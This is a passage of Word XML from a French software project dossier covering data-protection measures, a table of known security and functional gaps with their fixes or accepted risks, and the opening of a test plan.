            <w:r>
              <w:t>Écoute sur l'interface de bouclage uniquement, version ≥ 0.18 (§ 11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Le dernier point de ce tableau est la seule mesure de ce dossier qui ne soit pas dans le code : c'est une consigne de déploiement. Elle figure donc dans la liste de contrôle du § 6, parce qu'une mesure de sécurité qui n'est écrite nulle part n'est pas une mesure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkStart w:id="119" w:name="Xa05696c868e61d79898635404fa157da2630d6f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Protection des données personnelles</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Exigence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mise en œuvre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minimisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quatre données d'identité collectées : nom, prénom, adresse électronique, mot de passe haché. Aucune donnée de facturation, de géolocalisation ni de traçage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consentement prouvable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Table</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">consentement</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>: type, réponse et horodatage de chaque recueil (§ 5.4) ; l'inscription est refusée sans consentement explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Droit à l'effacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Suppression en cascade déclarée côté ORM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>côté SGBD (§ 5.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Absence de transfert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Inférence entièrement locale : aucun contenu rédigé ne quitte l'infrastructure (§ 5.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pages mentions légales, CGU et politique de confidentialité intégrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transparence IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Partiellement couverte ; compléments AI Act identifiés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le point structurant est le troisième : le droit à l'effacement n'est pas implémenté par une fonction de suppression mais garanti par le schéma. Supprimer un compte supprime ses documents, ses dossiers, ses interactions IA, ses consentements, ses sessions et ses demandes de réinitialisation, y compris si la suppression est faite hors de l'application.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Une garantie portée par le modèle de données est plus solide qu'une garantie portée par du code applicatif</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, parce qu'elle survit à un oubli de développeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une réserve d'honnêteté : le journal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conserve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">content_before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">content_after</w:t>
      </w:r>
      <w:r>
        <w:t>, c'est-à-dire des extraits des documents de l'utilisateur. Cette conservation est nécessaire à la traçabilité exigée par le cahier des charges et à l'obligation de marquage de l'AI Act, mais elle double le stockage des contenus. Une durée de conservation explicite, et sa mention dans la politique de confidentialité, restent à définir.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="120" w:name="X93d10a80969c3831892638521d3d35f606f4e2d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Écarts résiduels connus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette liste est celle que j'ai relevée en confrontant le code à ce dossier. Elle est volontairement complète : un écart documenté se corrige, un écart passé sous silence se découvre en production.</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Écart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correction envisagée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/register</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">renvoie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">409 « Cet email est déjà utilisé »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Énumération de comptes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— contredit la mesure appliquée à</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/forgot-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Risque accepté et argumenté (KAN-94, § 4 du rapport d'audit) : l'inscription est la seule route où l'anti-énumération coûterait l'information « cette adresse est déjà prise »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pas de limitation de débit sur</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un jeton volé peut être rafraîchi sans plafond de fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Corrigé (KAN-95) : limite de 30 requêtes par minute sur /auth/refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user_session</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">n'est jamais purgée des lignes révoquées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Croissance de la table, une ligne par rafraîchissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Corrigé (KAN-96) : purge_expired_sessions(), appelée à chaque rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">current_app</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">importé dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">services/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>La règle de découpage du § 5.2 n'est pas strictement tenue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Injecter la configuration en paramètre (§ 7.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Durée de conservation du journal</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">non définie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">content_before</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">content_after</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">conservés sans limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixer une durée, la documenter, purger au-delà</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Journalisation applicative absente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucune trace des échecs d'authentification ni des</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Journaliser les événements de sécurité, sans données personnelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Borne minimale du quota incohérente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L'API impose ≥ 1, la contrainte</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CHECK</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">autorise 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Corrigé (KAN-98) : contrainte CHECK et validation d'API alignées, script de migration livré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audits outillés non réalisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sécurité et accessibilité vérifiées manuellement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>Faits : rapport d'audit de sécurité et rapport d'audit d'accessibilité (axe-core, 15 écrans, 0 violation). pip-audit et npm audit restent à brancher dans le pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Le premier écart est le plus instructif, et il n'a pas été corrigé mais assumé. Le projet applique l'anti-énumération à /login et /forgot-password, et la contredit à /register, qui répond 409 « Cet email est déjà utilisé ». La route a été écrite avant les deux autres, à un moment où le message explicite paraissait un simple confort d'usage : c'est le schéma habituel d'un défaut de sécurité — non pas une mesure ignorée, mais une mesure appliquée de façon inégale. La fermer demanderait de répondre 201 dans les deux cas et d'informer par courriel l'adresse déjà inscrite, au prix d'un parcours d'inscription qui ne dit plus à l'utilisateur légitime pourquoi son compte n'est pas créé. L'arbitrage est documenté au § 4 du rapport d'audit (KAN-94) : le risque est accepté, parce que l'information divulguée — « cette adresse a un compte » — est de faible valeur sur un service sans dimension sensible, et que le coût d'usage est immédiat. J'en retiens surtout qu'une propriété de sécurité doit être vérifiée sur toutes les routes concernées, pas sur celle qu'on écrit au moment où on y pense : c'est la raison d'être des tests TS-03 et TS-04 (§ 9), qui balaient l'ensemble des routes plutôt qu'un cas représentatif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Un défaut fonctionnel avait également été relevé lors de cette relecture, sans lien avec la sécurité : la route DELETE /documents/&lt;id_document&gt; se terminait par return "", — un tuple à un seul élément, là où Flask attend ("", 204). La suppression était bien effectuée en base, mais la construction de la réponse échouait et le client recevait une erreur 500. Corrigé depuis (KAN-93), et couvert par un test d'intégration. Le point mérite d'être gardé parce qu'il illustre exactement la valeur du plan de tests : la suppression d'un document était la seule route du projet qu'aucun test ne couvrait, et c'est la seule où un défaut de ce type a survécu jusqu'à la relecture.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkStart w:id="121" w:name="Xe17fac534b816f7c3d70e43b759f788955f726e"/>
    <w:p w14:paraId="2B50691A" w14:textId="745C3B77" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>La</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> présentation du plan de tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stratégie de test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le plan de tests s'organise en quatre niveaux, du moins coûteux au plus coûteux à exécuter. Ce classement n'est pas décoratif : il détermine ce qui tourne à chaque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et ce qui reste manuel.</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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Analyse statique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Types, style, erreurs de syntaxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vue-tsc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ruff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">push</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, avant tout test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests unitaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Composants métier isolés (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">services/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pytest</w:t>
            </w:r>
